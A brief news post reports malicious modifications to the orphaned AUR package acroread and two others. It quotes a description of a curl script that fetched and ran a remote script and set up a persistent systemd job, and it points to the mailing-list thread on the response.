Malware found in the Arch Linux AUR repository
Malware found in the Arch Linux AUR repository
Here's a
report in Sensors Tech Forum on the discovery of a set of hostile
packages in the Arch Linux AUR repository system. AUR contains
user-contributed packages, of course; it's not a part of the Arch distribution
itself. "The security investigation shows that shows that a
malicious user with the nick name xeactor modified in June 7 an orphaned
package (software without an active maintainer) called acroread. The
changes included a curl script that downloads and runs a script from a
remote site. This installs a persistent software that reconfigures systemd
in order to start periodically. While it appears that they are not a
serious threat to the security of the infected hosts, the scripts can be
manipulated at any time to include arbitrary code. Two other packages were
modified in the same manner.
" This
thread in the aur-general list shows the timeline of the discovery and
response.